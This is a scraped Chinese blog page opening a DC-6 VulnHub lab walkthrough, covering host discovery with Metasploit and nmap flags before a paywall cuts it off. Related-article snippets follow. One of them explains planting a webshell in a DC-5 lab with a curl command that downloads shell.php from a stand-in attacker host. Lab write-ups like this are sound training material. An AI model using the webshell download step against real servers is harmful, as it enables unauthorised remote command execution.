DC系列漏洞靶场-渗透测试学习复现(DC-6)

最新推荐文章于 2024-03-26 16:08:20 发布
最新推荐文章于 2024-03-26 16:08:20 发布
阅读量2.5k 收藏 5
点赞数 2
分类专栏: DC靶场渗透测试学习 文章标签: shell 安全 http python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W983079520/article/details/110798735
版权

DC-6是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。

DC-6使用的操作系统为Debian 64位。

靶场下载链接:

1 http://www.five86.com/downloads/DC-6.zip

2 https://download.vulnhub.com/dc/DC-6.zip

3 https://download.vulnhub.com/dc/DC-6.zip.torrent

 

1 环境搭建

下载靶场文件,使用Vbox或者VM打开即可;攻击机使用Kali-2020。

2 主机发现

使用msf中的扫描模块扫描主机

启动msf    msfconsole

使用scaner/discovery/arp_sweep模块

设置目标,开始扫描

扫描结果

3 端口探测

探测使用nmap工具

这里复习下nmap常见参数:

参数

参数说明

参数

参数说明

-sT

TCP扫描

-sU

UDP扫描

-sS

SYN扫描

-sF

FIN扫描

-sA

ACK扫描

-sR

RPC扫描

-sP

ICMP扫描

-iL

文件读取IP地址

-O

操作系统识别

-T4

级别越高,扫描速度越快

-sV
最低0.47元/天 解锁文章
^找猪的男孩^
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache RocketMQ RCE漏洞(CVE-2023-33246)
0xSec
06-01 9073
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
ROCKOA协同办公系统 2.3.2
05-01
ROCKOA协同办公系统是适用于中小型企业的通用型协同OA管理软件,融合了长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。 ROCKOA协同办公系统 2.3.2 更新日志:2016-07-05 1、添加自定义元素。2、自定义表单开发流程。
DC-6靶场实战
qq_42754807的博客
03-26 1011
DC-6靶场实战
rockoa开发笔记
weixin_30325487的博客
01-05 448
rockoa开发笔记 1.开启PHP短标签,2.数据库密码配置在webrock/webrockConfig.php posted on 2016-01-05 23:54 过去的泉 阅读(...) 评论(...) 编辑 收藏 var allowComments=t...
There is one Storage type XSS vulnerability that can js code execution in rockoa 1.9.8
adminxw的博客
11-03 3143
Official website: http://www.rockoa.com/ demo link: http://demo.rockoa.com/ Vulnerability path: webmain/flow/input/mode_emailmAction.php line: 34-63 protected function saveafter($table, $arr, $id, $ad...
漏洞-CVE-2023-33246 Apache RocketMQ RCE漏洞原理与
关注网络安全、云原生安全
07-15 3265
服务端管理员调用的接口没有鉴权,且将内容直接拼接到执行的命令,没有做过滤。
WuThreat身份安全云-TVD每日漏洞情报-2023-03-21
wuthreat无胁科技的博客
03-21 421
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-27586。漏洞编号:CVE-2023-28424。
oracle靶场,网络靶场_在线网络安全学习平台|合天智汇
weixin_42415451的博客
04-11 263
前言Shiro这个词最近在安全圈挺火的,我是第一次接触到这个,所以Apache发漏洞通告的时候还是给我整的有点懵。在看师傅们的时也感到有点吃力,因此整理了下关于这个漏洞的相关知识点,写了点自己的理解以供还未接触过这个知识点的同学们参考,同时也给今后习留下参考。个人水平有限,可能存在理解偏差,请路过的大佬们指正。cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容...
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
ROCKOA协同办公OA v2.3.2.zip
07-07
ROCKOA协同办公OA  更新日志: 1、添加自定义元素。 2、自定义表单开发流程。 ROCKOA协同办公OA简介 ROCKOA办公系统是适用于中小型企业的通用型协同OA管理软件,融合了长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。 ROCKOA使用敏捷Ext前端开发框架,支持多种模块分布式开发,统一布局,界面简洁不失严肃。其功能包含有个人办公、工作流、人力资源、行政办公、员 工档案、用户管理等,含盖60多个功能点,适合于企业领域内若干规范和要求,构成高性能、高可用、高质量、底成本的信息化管理平台。  ROCKOA协同办公OA页面展示 相关阅读 同类推荐:oa系统
rockoa_v2.0_oa办公系统
08-12
rockoa_v2.0_oa办公系统,php+mysql,windows系统
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
蓝凌(Landray)OA漏洞常见RCE
qq_53385700的博客
01-12 1万+
蓝凌OA常见RCE的poc
致远OA漏洞
热门推荐
混子
12-31 4万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
靶机7 DC-6(过程超详细)
honest_gg的博客
09-26 2847
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
vulnhub靶场DC-6
qq_58091216的博客
01-11 1134
只有一个flag。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值